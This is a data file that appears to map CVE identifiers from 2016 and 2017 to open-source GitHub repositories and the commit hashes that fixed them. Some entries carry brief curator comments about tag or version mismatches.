+CVE-2016-8569;https://github.com/libgit2/libgit2;None:None;False;dfc2c713433b3a932e4d8b648738e3b63086baec,821042b673675546a265827ea184c6fa14e0623d,aae89534961cdb7b445be890a056b67c5d18547f,4974e3a59648095ffa6fce6c5b651a820c0c34b9,a719ef5e6d4a1a8ec53469c7914032ed67922772; +CVE-2016-8579;https://github.com/appc/docker2aci;None:None;False;2ab8826d6957d97ed64e5e29a484af6370eae2e1,54331ec7020e102935c31096f336d31f6400064f,e371d6523193342d193bcef9f446e14d09eefc4d; +CVE-2016-8610;https://github.com/openssl/openssl;None:None;False;af58be768ebb690f78530f796e92b8ae5c9a4401,22646a075e75991b4e8f5d67171e45a6aead5b48; +CVE-2016-8629;https://github.com/keycloak/keycloak;None:None;False;a78cfa4b2ca979a1981fb371cfdf2c7212f7b6e2,3d46b4c425d39b004566cc78164e1ffbe37d647c; +CVE-2016-8640;https://github.com/geopython/pycsw;None:None;False;2565ab332d3ccae328591ea9054d0387a90f2e86,d83df944b1fc0f266444c31852c7730f0f41db87,522873e5ce48bb9cbd4e7e8168ca881ce709c222,69546e13527c82e4f9191769215490381ad511b2,daaf09b4b920708a415be3c7f446739661ba3753; +CVE-2016-8738;https://github.com/apache/struts;None:None;False;554b9dddb0fbd1e581ef577dd62a7c22955ad0f6; +CVE-2016-8739;https://github.com/apache/cxf;None:None;False;8e4970d931ae72f92c54d170a844b37137b8fda6,9deb2d179758d3da47ce3ea492c2606c0a6a8475,d9e2a6e7260ea12efa5355ffdfbf0b2415bccd14; +CVE-2016-8745;https://github.com/apache/tomcat;None:None;False;16a57bc885e212839f1d717b94b01d154a36943a,cbc9b18a845d3c8c053ac293dffda6c6c19dd92b,143bb466cf96a89e791b7db5626055ea819dad89; test file... +CVE-2016-8747;https://github.com/apache/tomcat;None:None;False;9601a937ff3b7ef5d04b2a0e950d0e44e1bb4cbd,452c8094a665ef6375530e81c033da4eeb2e4865; +CVE-2016-8750;https://github.com/apache/karaf;None:None;False;ff5792d9b19997318c487bd23edb2c5063ca88c6,ac07cb2440ceff94b3001728c1611fc471253d19; +CVE-2016-8867;https://github.com/moby/moby;None:None;False;ed879071ecff0e082ae6e59481f640f89ea87013,d60a3418d0268745dff38947bc8c929fbd24f837; +CVE-2016-9015;https://github.com/hbashton/urllib3;None:None;False;056045a062478e3c3afc2402ec81680d53490876,5e36a7096455ea94fb28b623d64e1f1bad97f822; +CVE-2016-9121;https://github.com/square/go-jose;None:None;False;c7581939a3656bb65e89d64da0a52364a33d2507,7f0dd807d3f3d73bb536898cb7980ddf638ce69a,60e9804a61881698227b7b19c0a11d49d6930e4f; +CVE-2016-9122;https://github.com/square/go-jose;None:None;False;2c5656adca9909843c4ff50acf1d2cf8f32da7e6,350b3415970b0dd6d2ffe4574d5fc0a71a900562; +CVE-2016-9189;https://github.com/python-pillow/Pillow;None:None;False;5fac61d03e1619db086e477c67b12189be6f84b6,fe7b41b4381325a83707ea9bbd0062812dc8dfc2,c50ebe6459a131a1ea8ca531f10da616d3ceaa0f; +CVE-2016-9190;https://github.com/python-pillow/Pillow;None:None;False;5fac61d03e1619db086e477c67b12189be6f84b6,5d8a0be45aad78c5a22c8d099118ee26ef8144af,d4663806a89d28e30cbb9f7eac7b03a04f09cb31; +CVE-2016-9243;https://github.com/pyca/cryptography;None:None;False;b924696b2e8731f39696584d12cceeb3aeb2d874,aebfba28a42b608a2c5f8bf7d45402c415b893a4; +CVE-2016-9298;https://github.com/ImageMagick/ImageMagick;None:None;False;3cbfb163cff9e5b8cdeace8312e9bfee810ed02b; +CVE-2016-9814;https://github.com/simplesamlphp/saml2;None:None;False;7008b0916426212c1cc2fc238b38ab9ebff0748c,f72e98a74083e54f49df2596d4520ae5d5fc80f6,3f268c25ca5e9748652834faad04525746227ef7,2a2bd4398257cbe72251c68348be72707cc77262; +CVE-2016-9878;https://github.com/spring-projects/spring-framework;None:None;False;e2d6e709c3c65a4951eb096843ee75d5200cfcad,a7dc48534ea501525f11369d369178a60c2f47d0,43bf008fbcd0d7945e2fcd5e30039bc4d74c7a98; +CVE-2016-9879;https://github.com/spring-projects/spring-security;None:None;False;6d30da2e1f166ceac339899295e1b8a8ff2f08c4,ed2ae21074b7850d386371b2ab9e29268ef2f0c0,666e356ebc479194ba51e43bb99fc42f849b6175; +CVE-2016-9909;https://github.com/html5lib/html5lib-python;None:None;False;9b8d8eb5afbc066b7fac9390f5ec75e5e8a7cab7; +CVE-2016-9910;https://github.com/html5lib/html5lib-python;None:None;False;9b8d8eb5afbc066b7fac9390f5ec75e5e8a7cab7; +CVE-2016-9962;https://github.com/opencontainers/runc;None:None;False;5d93fed3d27f1e2bab58bad13b180a7a81d0b378; +CVE-2016-10033;https://github.com/PHPMailer/PHPMailer;None:None;False;833c35fe39715c3d01934508987e97af1fbc1ba0,9743ff5c7ee16e8d49187bd2e11149afb9485eae,4835657cd639fbd09afd33307cef164edf807cdc,ed4e7ce8ad877a8f578139c491c256ab1933c7c9; +CVE-2016-10100;https://github.com/borgbackup/borg;None:None;False;f2f50efc2873636dc7acfcd222e21fe40fe667a5; +CVE-2016-10127;https://github.com/IdentityPython/pysaml2;None:None;False;8c2b0529efce45b94209da938c89ebdf0a79748d,6e09a25d9b4b7aa7a506853210a9a14100b8bc9b; +CVE-2016-10129;https://github.com/libgit2/libgit2;None:None;False;66e3774d279672ee51c3b54545a79d20d1ada834,2fdef641fd0dd2828bd948234ae86de75221a11a,921e3a68e26ad23d9c5b389fdc61c9591bdc4cff,ccee8cabc3fd187046bbfccb407de95dafc310f6,4ac39c76c0153d1ee6889a0984c39e97731684b2,84d30d569ada986f3eef527cbdb932643c2dd037; +CVE-2016-10149;https://github.com/IdentityPython/pysaml2;None:None;False;6e09a25d9b4b7aa7a506853210a9a14100b8bc9b; +CVE-2016-10173;https://github.com/halostatue/minitar;None:None;False;30e62689b614938dc96b4f2cb8e033e72f650670; +CVE-2016-10190;https://github.com/FFmpeg/FFmpeg;None:None;False;2a05c8f813de6f2278827734bf8102291e7484aa,606b21353df7d08ea203193f3026281737c696a2,2e3f0a1c6f39cf2a35bdda85e43970ffc6db797b,18e3e322b36a85b6f69662e1d5fa7c245638ab86,0e0a413725e0221e1a9d0b7595e22bf57e23a09c; +CVE-2016-10191;https://github.com/FFmpeg/FFmpeg;None:None;False;7d57ca4d9a75562fa32e40766211de150f8b3ee7,5bfb0b02b6fbb38c058659dc09c01602d0d1f523,a5513ae7bc7cb131e7b7edba57e4cf93121d6c8e,b0ebef0578fd88fe3efd66086c43a5b43fbc9f6a,32b95471a86ae383c0f76361d954aec511f7043a; +CVE-2016-10192;https://github.com/FFmpeg/FFmpeg;None:None;False;a5d25faa3f4b18dac737fdb35d0dd68eb0dc2156,e0cb113f9b4b7a26ac0053a483f92c26a4a90f0e,1768e02a046ac05cb212991ae23021ad412cd15a,37904d11779482f375b13da24f33f75daf13638f,c12ee64e80af2517005231388fdf4ea78f16bb0e; +CVE-2016-10193;https://github.com/dejan/espeak-ruby;None:None;False;5251744b13bdd9fb0c72c612226e72d330bac143,119b2d6691ed954c84ceaa6e41a6915e6ea01938; +CVE-2016-10345;https://github.com/phusion/passenger;None:None;False;e5b4b0824d6b648525b4bf63d9fa37e5beeae441; +CVE-2016-10522;https://github.com/sferik/rails_admin;None:None;False;b13e879eb93b661204e9fb5e55f7afa4f397537a; +CVE-2016-10524;https://github.com/oliversalzburg/i18n-node-angular;None:None;False;877720d2d9bb90dc8233706e81ffa03f99fc9dc8; +CVE-2016-10526;https://github.com/tschaub/grunt-gh-pages;None:None;False;2d277e3e969ccd4c2d493f3795400fa77e6b6342,590f69767203d8c379fe18cded93bd5ad6cb53cb; fixed tag is vulnerable +CVE-2016-10528;https://github.com/coderaiser/node-restafary;None:None;False;63e4b13c802991bbff2d0af8bd15b0bce9ff971a; +CVE-2016-10529;https://github.com/silverwind/droppy;None:None;False;62ae2cbc87e0e4b7b61205b3d926e275c8f1accc; +CVE-2016-10531;https://github.com/markedjs/marked;None:None;False;2cff85979be8e7a026a9aca35542c470cf5da523; commit outside the time range +CVE-2016-10532;https://github.com/cloudcmd/console-io;None:None;False;62f0fbcb36226436af0dad52ffe4d8cd9a0c533f; +CVE-2016-10536;https://github.com/socketio/engine.io-client;None:None;False;2c55b278a491bf45313ecc0825cf800e2f7ff5c1; +CVE-2016-10538;https://github.com/node-js-libs/cli;None:None;False;ed90515500557e2b82d6ce6004cc9a81fb090501,fd6bc4d2a901aabe0bb6067fbcc14a4fe3faa8b9; questa boh +CVE-2016-10540;https://github.com/isaacs/minimatch;None:None;False;6944abf9e0694bd22fd9dad293faa40c2bc8a955; +CVE-2016-10542;https://github.com/websockets/ws;None:None;False;0328a8f49f004f98d2913016214e93b2fc2713bc,3e1caf42088c7cd236f23b972917588368ad8531; +CVE-2016-10543;https://github.com/hapijs/call;None:None;False;9570eee5358b4383715cc6a13cb95971678efd30; +CVE-2016-10544;https://github.com/uNetworking/uWebSockets;None:None;False;37deefd01f0875e133ea967122e3a5e421b8fcd9; +CVE-2016-10550;https://github.com/sequelize/sequelize;None:None;False;d198d78182cbf1ea3ef1706740b35813a6aa0838; +CVE-2016-10554;https://github.com/sequelize/sequelize;None:None;False;c876192aa6ce1f67e22b26a4d175b8478615f42d; +CVE-2016-10555;https://github.com/hokaccha/node-jwt-simple;None:None;False;957957cfa44474049b4603b293569588ee9ffd97,ecf908a57fce953b5daf0139bcff85eca869a630; vulnerable tag is fixed +CVE-2016-10556;https://github.com/sequelize/sequelize;None:None;False;23952a2b020cc3571f090e67dae7feb084e1be71; +CVE-2016-10557;https://github.com/appium/appium-chromedriver;None:None;False;c5a4caa8c45cd7842537c2031a77a5273cc198c8,c7e384afcddf009636b8e5bb23b1f06150eda293; +CVE-2016-10558;https://github.com/aerospike/aerospike-client-nodejs;None:None;False;d5e916a3a65c169e60200f18f02524c67bb58237; the fixing commit changes a bash script file and some .ini files, while from the advisory we are filtering out only .js files +CVE-2016-10559;https://github.com/groupon/selenium-download;None:None;False;1957ca79707b9bee224b222500ceb250f736b93b; +CVE-2016-10560;https://github.com/hypery2k/galenframework-cli;None:None;False;dcf9505f77f2ea50f84372f9b6b521c89561cbe1; +CVE-2016-10562;https://github.com/barretts/node-iedriver;None:None;False;32ca1602573618c8d76182c4f2a30aee379d6629; this repo has no tag, current timespan gives zero commits +CVE-2016-10564;https://github.com/rubenv/node-apk-parser;None:None;False;5e359c08ba57775857d309c57f9830f19b1cf774; +CVE-2016-10566;https://github.com/davidmarkclements/install-nw;None:None;False;5c64eff1ed116fceeba55a51867554f0fe4f6556; same as above +CVE-2016-10567;https://github.com/connected-web/product-monitor;None:None;False;122122c605a235d5897590c0ef9d3682961707de; +CVE-2016-10568;https://github.com/geoip-lite/node-geoip;None:None;False;29f9db3f25d6d6364e3e2ab274713e6f81e8c695; fixed tag is vulnerable +CVE-2016-10569;https://github.com/nodeca/embedza;None:None;False;19ab5ed72c37a311ba2685f4ef4ed08b3b5c95c3; +CVE-2016-10570;https://github.com/jefflembeck/pngcrush-installer;None:None;False;cf36e9a5492a591493836b7fea69ae3ec34f7f75,d56bc439fc6ed0654b30b345906f77bd000368f3; +CVE-2016-10571;https://github.com/vseryakov/bkjs-wand;None:None;False;3b8d854dd765546ecb77282a6f87406746378dcf; this repo has no tag, current timespan gives zero commits +CVE-2016-10572;https://github.com/Janpot/mongodb-instance;None:None;False;c8fea750f8020ace8410c442b2684b33a9fddd3b; same as above +CVE-2016-10573;https://github.com/tobli/baryton-saxophone;None:None;False;a5e943c46779e5372cdd13bfe2a69ec2530045be; +CVE-2016-10574;https://github.com/zhao0/node-apk-parser3;None:None;False;ba1ade7f677dc5c80fe3f7355794d501b61a7917; +CVE-2016-10575;https://github.com/hakatashi/kindlegen;None:None;False;9a67ba62890ab78597f4c3af36b97e19ea410fa4; +CVE-2016-10576;https://github.com/zazukoians/fuseki;None:None;False;154c0f12c468a8af33562dff12b1bb0e5b659df9; same as above +CVE-2016-10577;https://github.com/ibmdb/node-ibm_db;None:None;False;d7e2d4b4cbeb6f067df8bba7d0b2ac5d40fcfc19; +CVE-2016-10579;https://github.com/giggio/node-chromedriver;None:None;False;71981099216b7c15ec01e50baaacb15fe1b85e56,5ad68a36c3260760f1eb40d9c7906c6ea19c05b3; was 2.26.0:2.26.1 +CVE-2016-10582;https://github.com/dcodeIO/ClosureCompiler.js;None:None;False;c01efe9d86dc8d07e14c5a6ba1586244ce53a698,e59848f5975e5b15279c044daf9cff8ff192bae6; +CVE-2016-10586;https://github.com/macacajs/macaca-chromedriver;None:None;False;03cb4a186b83122383bc2292761d418f519bf3b9; current timespan gives only ten commits +CVE-2016-10587;https://github.com/wasdk/wasdk;None:None;False;58c2d22e7958d921e4f90d56805460ca33918971; this repo has no tag, current timespan gives zero commits +CVE-2016-10588;https://github.com/nwjs/npm-installer;None:None;False;adb4df1e012d38a3872578d484291b9af07aad5b; unknown +CVE-2016-10591;https://github.com/rse/node-prince;None:None;False;c7e355bd3d3e4bc060f102c5264e838f379aa8a8; +CVE-2016-10611;https://github.com/Strider-CD/strider-sauce;None:None;False;5ff6d6593f89aee505b4e86958ab6f8898baa9eb; +CVE-2016-10626;https://github.com/koorchik/node-mystem3;None:None;False;4bd31c0e0110afc327c414d7ebfc2ffe738cbad2; +CVE-2016-10694;https://github.com/tobli/alto-saxophone;None:None;False;ef8d579ae68a95027afd5204ca644cf00cf72b70; +CVE-2016-10703;https://github.com/jfhbrook/node-ecstatic;None:None;False;71ce93988ead4b561a8592168c72143907189f01; +CVE-2016-10735;https://github.com/twbs/bootstrap;None:None;False;bcad4bcb5f5a9ef079b2883a48a698b35261e083; +CVE-2016-10745;https://github.com/pallets/jinja;None:None;False;9b53045c34e61013dc8f09b7e52a555fa16bed16,74bd64e56387f5b2931040dc7235a3509cde1611; +CVE-2016-10750;https://github.com/hazelcast/hazelcast;None:None;False;5a47697519018eb4918df33a21faae811e85f01a,ef4bea032d9f662bd63c690f4c1d6a2bcea6c2a7; vulnerable tag is fixed + commit timestamp is outside the time interval +CVE-2016-1000232;https://github.com/salesforce/tough-cookie;None:None;False;e4fc2e0f9ee1b7a818d68f0ac7ea696f377b1534,615627206357d997d5e6ff9da158997de05235ae; +CVE-2016-1000236;https://github.com/tj/node-cookie-signature;None:None;False;39791081692e9e14aa62855369e1c7f80fbfd50e; +CVE-2016-1000282;https://github.com/haraka/Haraka;None:None;False;2998b8b0455b8cc2c640344328439e10e685aad9,816af2f47755d36cdcd69f888b173b7ed24d3d89,a772fccad35475dfc66a0ac0c60a60322189f1f5,468fd214ca3ba58ac4b371bd7f7609ca9b1a6699; +CVE-2016-1000338;https://github.com/bcgit/bc-java;None:None;False;b0c3ce99d43d73a096268831d0d120ffc89eac7f; +CVE-2016-1000340;https://github.com/bcgit/bc-java;None:None;False;790642084c4e0cadd47352054f868cc8397e2c00; +CVE-2016-1000343;https://github.com/bcgit/bc-java;None:None;False;50a53068c094d6cff37659da33c9b4505becd389; +CVE-2016-1000344;https://github.com/bcgit/bc-java;None:None;False;9385b0ebd277724b167fe1d1456e3c112112be1f; +CVE-2017-0224;https://github.com/chakra-core/ChakraCore;None:None;False;f022afb8246acc98e74a887bb655ac512caf6e72; +CVE-2017-0904;https://github.com/jtdowney/private_address_check;None:None;False;58a0d7fe31de339c0117160567a5b33ad82b46af; +CVE-2017-0905;https://github.com/recurly/recurly-client-ruby;None:None;False;1bb0284d6e668b8b3d31167790ed6db1f6ccc4be,1605e72ae631d3d300815d23c9eb4d42c1ab2f7e,3b23f442e36a5cc7034abb997312761bd0c15a81,242252e37cdb36cf5bd526855feed388d54a6c7e,9ea7a7dd25778666c3501991df2dabbcfa60f93a,b480ea5118be44dc4a8ee50a501e402be943e9c6,08c4766b75b286193fcd41421d9303fc4d18f1c0,9834a8c6fecffc16f1e9e9c651b67fca07bf64d9,5ff4907e1c1a3d9356e0658ae43cec594b764f09,c8c36508c8acd81768909ad2d155462a9d50a3bd,a6ccc217daa166f8fbc12e32ddeb6d33cf43653e,2ee039868e54eb1bd9a219ff759f008140a9a16b,e540c6535980f216f6d6338c51d11ced3440518b; +CVE-2017-0906;https://github.com/recurly/recurly-client-python;None:None;False;049c74699ce93cf126feff06d632ea63fba36742,c993068ecca65956ec91282f4d15946dcdcf21e0,1af0c48131df43a2f40c41df540ea8b1886c402d,94d08c9ae78448112a61e8586f0253f4dce18485,02d648db134403e53588646084c9cbd9fb0a8177,bd199d12de021bf7e4d3b504d60a11dd0f0beeb6,37762f28f9a3559b603d726e56de899536c4a49d; +CVE-2017-0907;https://github.com/recurly/recurly-client-dotnet;None:None;False;9eef460c0084afd5c24d66220c8b7a381cf9a1f1,54d2f1992096495efb026a97518bb55c5bd70641,56b005dc464132c9c505454042c9d949ace9dc42,c20f49b6cb69564db1af657bdb98aa4ae1da31b5,69aef8ff955b174463e73e234b154eb915787cc3,8e05a530e494e6162997d5a551fefe5ff14d40f0,f0fc3715670a06736b1ba45e7b8a3a525444b524,efe4873ac652f7a992fe1460ec8c9330189b0410,a711b927c8917dd98dc3cecf9f799ba3f3b1d67d; +CVE-2017-0909;https://github.com/jtdowney/private_address_check;None:None;False;516ab853e788f1392f81b59cbe30e136f3836cdf,d1389cbc919aa9e7ef28a34335b104caab73288d,53b55b32dfebd4461a241e09b8af2dbe44d86ce5,6e614921aeee96fa5850f0f667618890754d19a5,6927b2e4ae1ed6c51d1e7639624cf43b0b0e8ba6,4ce63152a1aff6e01e31ff4cc134a485ab018dea; +CVE-2017-0929;https://github.com/dnnsoftware/Dnn.Platform;None:None;False;f7a48e4df93c027325578ff0649733d19e1894fa,d3953db85fee77bb5e6383747692c507ef8b94c3; +CVE-2017-2582;https://github.com/keycloak/keycloak;None:None;False;8a02ef18597e5929517d702238b09ae780eaf421,0cb5ba0f6e83162d221681f47b470c3042eef237; +CVE-2017-2592;https://github.com/openstack/oslo.middleware;None:None;False;ec073669a49267abcb0c1d776b9050342dac5a4a,6c0f50c1f5f4122b31dbfe25aacdce596bf4b648; +CVE-2017-2617;https://github.com/hawtio/hawtio;None:None;False;8cf6848f4d4d4917a4551c9aa49dc00f699eb569; +CVE-2017-2638;https://github.com/infinispan/infinispan;None:None;False;f2d54c4ecb75c7264d4160ca7c461135712201a9; +CVE-2017-2649;https://github.com/jenkinsci/active-directory-plugin;None:None;False;a5e92137dc1f892ebfb3e371725b787860ddb539,063c282ad258c020f1776a6c4b3d1b3f95d74aef; +CVE-2017-2652;https://github.com/jenkinsci/distfork-plugin;None:None;False;312bad498c9bce23a66bd2aba20d0d3de1e0cf8d; +CVE-2017-2667;https://github.com/theforeman/hammer-cli;None:None;False;74b926ae24f47f1d93b778e06b64935e57b60e33; +CVE-2017-2670;https://github.com/undertow-io/undertow;None:None;False;08d6eaf61dab51403990e1fffa4c1d53212e4722,3ad7537d0bfeed5950afda0428ea704e5f00d815,9bfe9fbbb595d51157b61693f072895f7dbadd1d; +CVE-2017-2809;https://github.com/tomoh1r/ansible-vault;None:None;False;3f8f659ef443ab870bb19f95d43543470168ae04; +CVE-2017-3156;https://github.com/apache/cxf;None:None;False;1338469f7d25cfcda75b547c68bed95bd97903ac,e66ce235ee5f8dbde467c8c23eeb622b072d0bf3,555843f9563ccfc2ca1afb2950aebb4505d7711b; +CVE-2017-3204;https://github.com/golang/crypto;None:None;False;e4e2799dd7aab89f583e1d898300d96367750991; +CVE-2017-4952;https://github.com/vmware-archive/xenon;None:None;False;ec30db9afada9cb52852082ce4d7d0095524f3b3,c23964eb57e846126daef98ef7ed15400313e977,b1fd306047ecdac82661d636ebee801a7f2b3a0a,7a747d82b80cd38d2c11a0d9cdedb71c722a2c75,aac1921a1e5480addb1101a513d93dc25de71b50,1a35836973a695157749b0bbbf45b8b2fdcecbd3,756d893573414eec8635c2aba2345c4dcf10b21c,5682ef8d40569afd00fb9a5933e7706bb5b66713,30ae41bccf418d88b52b35a81efb3c1304b798f8,06b9947cf603ba40fd8b03bfeb2e84528a7ab592; +CVE-2017-4971;https://github.com/spring-projects/spring-webflow;None:None;False;57f2ccb66946943fbf3b3f2165eac1c8eb6b1523,ec3d54d2305e6b6bce12f770fec67fe63008d45b; +CVE-2017-4973;https://github.com/cloudfoundry/uaa;None:None;False;9d44cb0c7c25ccae95bfa1c2d59ce46200c643cb; +CVE-2017-4995;https://github.com/spring-projects/spring-security;None:None;False;947d11f433b78294942cb5ea56e8aa5c3a0ca439,5dee8534cd1b92952d10cc56335b5d5856f48f3b; +CVE-2017-5209;https://github.com/libimobiledevice/libplist;None:None;False;3a55ddd3c4c11ce75a86afbefd085d8d397ff957; +CVE-2017-5537;https://github.com/WeblateOrg/weblate;None:None;False;46e7e58af7fba25f9e68a1e962e339da8e829f3b,abe0d2a29a1d8e896bfe829c8461bf8b391f1079; +CVE-2017-5545;https://github.com/libimobiledevice/libplist;None:None;False;7391a506352c009fe044dead7baad9e22dd279ee; +CVE-2017-5591;https://github.com/poezio/slixmpp;None:None;False;22664ee7b86c8e010f312b66d12590fb47160ad8; +CVE-2017-5594;https://github.com/pagekit/pagekit;None:None;False;e0454f9c037c427a5ff76a57e78dbf8cc00c268b,17cc46211ccb3588cc83be96ffa1b971e38d26f0; +CVE-2017-5637;https://github.com/apache/zookeeper;None:None;False;5fe68506f217246c7ebd96803f9c78e13ec2f11a,0313a0e0b6c47b316271533165e5830d1ca04478,835377f0e1cd215e791ed29c0bcff95e625f299c,6d9fc04c052adbc79bbbb1c63f3f00c816fb8e56; +CVE-2017-5638;https://github.com/apache/struts;None:None;False;352306493971e7d5a756d61780d57a76eb1f519a,6b8272ce47160036ed120a48345d9aa884477228; fixed tag is vulnerable (changed) (adv specify wrong) +CVE-2017-5641;https://github.com/apache/flex-blazeds;None:None;False;f861f0993c35e664906609cad275e45a71e2aaf1; +CVE-2017-5643;https://github.com/apache/camel;None:None;False;8afc5d1757795fde715902067360af5d90f046da,2c6964ae94d8f9a9c9a32e5ae5a0b794e8b8d3be,9f7376abbff7434794f2c7c2909e02bac232fb5b; extracted wrong vers from CPE. +CVE-2017-5645;https://github.com/apache/logging-log4j2;None:None;False;5dcc19215827db29c993d0305ee2b0d8dd05939d; +CVE-2017-5858;https://github.com/conversejs/converse.js;None:None;False;e81eaf323ef241f364f0ea8b6abb53439e20efcc; +CVE-2017-5934;https://github.com/moinwiki/moin-1.9;None:None;False;70955a8eae091cc88fd9a6e510177e70289ec024; +CVE-2017-5936;https://github.com/openstack-archive/nova-lxd;None:None;False;1b76cefb92081efa1e88cd8f330253f857028bd2; +CVE-2017-5946;https://github.com/rubyzip/rubyzip;None:None;False;ce4208fdecc2ad079b05d3c49d70fe6ed1d07016; +CVE-2017-5954;https://github.com/commenthol/serialize-to-js;None:None;False;0cea49eeb56eb30f6ee121524b7ea8ed208ab10d,1cd433960e5b9db4c0b537afb28366198a319429; +CVE-2017-7481;https://github.com/ansible/ansible;None:None;False;f0e348f5eeb70c1fb3127d90891da43b5c0a9d29,a1886911fcf4b691130cfc70dfc5daa5e07c46a3,fd30f5328986f9e1da434474481f32bf918a600c,ed56f51f185a1ffd7ea57130d260098686fcc7c2; +CVE-2017-7525;https://github.com/FasterXML/jackson-databind;None:None;False;60d459cedcf079c6106ae7da2ac562bc32dcabe1,6ce32ffd18facac6abdbbf559c817b47fcb622c1; one was wrong from tracer, another was just test files the one in advisory does not exist is from another repo +CVE-2017-7536;https://github.com/hibernate/hibernate-validator;None:None;False;0886e89900d343ea20fde5137c9a3086e6da9ac9,0ed45f37c4680998167179e631113a2c9cb5d113,0778a5c98b817771a645c6f4ba0b28dd8b5437b8; +CVE-2017-7540;https://github.com/svenfuchs/safemode;None:None;False;a019520e441dab1a277fa9aeb41e9266783e9533; was 1.3.2:1.3.3 +CVE-2017-7545;https://github.com/kiegroup/jbpm-designer;None:None;False;a143f3b92a6a5a527d929d68c02a0c5d914ab81d,d9c355a53f0102e71cc668cd8fca440f5f46bdf1,cede7932601439cbc1c3708d0b5bb61f3601abe1; +CVE-2017-7653;https://github.com/eclipse/mosquitto;None:None;False;b11855821e5848fdbb6f66b609b2e1c25c7ddb8a,729a09310a7a56fbe5933b70b4588049da1a42b4; +CVE-2017-7654;https://github.com/eclipse/mosquitto;None:None;False;51ec5601c2ec523bf2973fdc1eca77335eafb8de; +CVE-2017-7656;https://github.com/eclipse/jetty.project;None:None;False;a285deea42fcab60d9edcf994e458c238a348b55; +CVE-2017-7657;https://github.com/eclipse/jetty.project;None:None;False;a285deea42fcab60d9edcf994e458c238a348b55,be8ff431a4b9b2e51c4c847512dfbc70166b8089; +CVE-2017-7660;https://github.com/apache/lucene-solr;None:None;False;e3b0cfff396a7f92a4f621d598780116da916f3f,2f5ecbcf9ed7a3a4fd37b5c55860ad8eace1beae,e912b7cb5c68fbb87b874d41068cf5a3aea17da0,9f91c619a35db89544f5c85795df4128c9f0d96a; +CVE-2017-7661;https://github.com/apache/cxf-fediz;None:None;False;acdbe8c213576792dd95d87315bcc181ea61b57f,f368c472e7beb26f8ca6f818eee8139d8caf2e6e,707b8f95395a3a9ba6d2643053578081e91e5673; +CVE-2017-7662;https://github.com/apache/cxf-fediz;None:None;False;c68e4820816c19241568f4a8fe8600bffb0243cd,71480c3f7e516cf0d535fdd5abec63ab455e4d06; +CVE-2017-7666;https://github.com/apache/openmeetings;None:None;False;aadcd3e4eaaba5a6d322eb53f48c3bbb4fd7a5da,44800f8a18c7e9a30b379ef057067cb26181b532; +CVE-2017-7674;https://github.com/apache/tomcat;None:None;False;b94478d45b7e1fc06134a785571f78772fa30fed; +CVE-2017-7675;https://github.com/apache/tomcat;None:None;False;dacb030b85fe0e0b3da87469e23d0f31252fdede,cf181edc9a8c239cde704cffc3c503425bdcae2b; +CVE-2017-7688;https://github.com/apache/openmeetings;None:None;False;13fe2f382240eab90f3050ecb7ea84d7121f4081; +CVE-2017-7860;https://github.com/grpc/grpc;None:None;False;f05359f6975003197d83ec5a1b78893e01000f99,bcd5f12e4bca2ed2c00cddb5ffd046aef6f4fb31,e2869fee8db5f7a94858b551089c45bbb1bd943b,d9314adb8e3bc687d15269c6e25554741ded4ea6,5f13f4898612c136cff1f2d04a91c25b6d4b694a; unknown, version not specified properly +CVE-2017-7861;https://github.com/grpc/grpc;None:None;False;f05359f6975003197d83ec5a1b78893e01000f99,bcd5f12e4bca2ed2c00cddb5ffd046aef6f4fb31,e2869fee8db5f7a94858b551089c45bbb1bd943b,d9314adb8e3bc687d15269c6e25554741ded4ea6,5f13f4898612c136cff1f2d04a91c25b6d4b694a; unknown, version not specified properly +CVE-2017-7957;https://github.com/x-stream/xstream;None:None;False;b3570be2f39234e61f99f9a20640756ea71b1b40,6e546ec366419158b1e393211be6d78ab9604abe; +CVE-2017-8028;https://github.com/spring-projects/spring-ldap;None:None;False;08e8ae289bbd1b581986c7238604a147119c1336; +CVE-2017-8045;https://github.com/spring-projects/spring-amqp;None:None;False;36e55998f6352ba3498be950ccab1d5f4d0ce655,83fe9fdec2c86a57898d56c5e109debd9d5c07d9,296d481f980fcbecbee01244e3644e254470a86e,6e9e00bb5bf0aa88444146db3c2eae138cc7b0a1; +CVE-2017-8046;https://github.com/spring-projects/spring-data-rest;None:None;False;f5bfe5358864de1a15566110de7ad7e5ffb48e99,8f269e28fe8038a6c60f31a1c36cfda04795ab45,824e51a1304bbc8334ac0b96ffaef588177e6ccd; vulnerable tag is fixed, but wrong tagging I believe +CVE-2017-8109;https://github.com/saltstack/salt;None:None;False;8492cef7a5c8871a3978ffc2f6e48b3b960e0151,6e34c2b5e5e849302af7ccd00509929c3809c658; +CVE-2017-8342;https://github.com/Kozea/Radicale;None:None;False;190b1dd795f0c552a4992445a231da760211183b,059ba8dec1f22ccbeab837e288b3833a099cee2d; +CVE-2017-8359;https://github.com/grpc/grpc;None:None;False;aab6992c006be6fb80df73fd9f218365099c016d,6544a2d5d9ecdb64214da1d228886a7d15bbf5c7; +CVE-2017-8418;https://github.com/rubocop/rubocop;None:None;False;dcb258fabd5f2624c1ea0e1634763094590c09d7; +CVE-2017-8658;https://github.com/chakra-core/ChakraCore;None:None;False;d08f260e7edabb2d4f90fd733b01eeaca1915222,63034a01dc508f27ced7099c9cc97babc4aebc1f,2500e1cdc12cb35af73d5c8c9b85656aba6bab4d,5c6fbc61ccc57826e0daaf07a71c2c536614c2ad; +CVE-2017-8932;https://github.com/golang/go;None:None;False;9294fa2749ffee7edbbb817a0ef9fe633136fa9c; +CVE-2017-9096;https://github.com/albfernandez/itext2;None:None;False;ad4259e57412f4b538df3a57c55e814cfe748a72; +CVE-2017-9214;https://github.com/openvswitch/ovs;None:None;False;7b7b186a8d40fc6f287cef2582702181da74bdc3,fafbfa6ea46911aeb0083f166fed215ca71e22b6; +CVE-2017-9265;https://github.com/openvswitch/ovs;None:None;False;1752ea92dc11935e0595d208fdfe8203baf5b55c,050f90662dde1da1ee3cdd209a9b65196a808811; +CVE-2017-9796;https://github.com/apache/geode;None:None;False;02b9646618e074f80b3d5fed0e5b512a34b5897a; +CVE-2017-9841;https://github.com/sebastianbergmann/phpunit;None:None;False;0c1ae1b5324fa10f96129c5679b788cc1ca9468e,284a69fb88a2d0845d23f42974a583d8f59bf5a5; +CVE-2017-10910;https://github.com/mqttjs/MQTT.js;None:None;False;403ba53b838f2d319a0c0505a045fe00239e9923,3323089ee777fcbf2281a3f3a965e2a4cd7c9ad9; +CVE-2017-11173;https://github.com/cyu/rack-cors;None:None;False;42ebe6caa8e85ffa9c8a171bda668ba1acc7a5e6; +CVE-2017-11424;https://github.com/jpadilla/pyjwt;None:None;False;11f30c4050a11b6398d38f505578c9dabeba6c78,37926ea0dd207db070b45473438853447e4c1392; 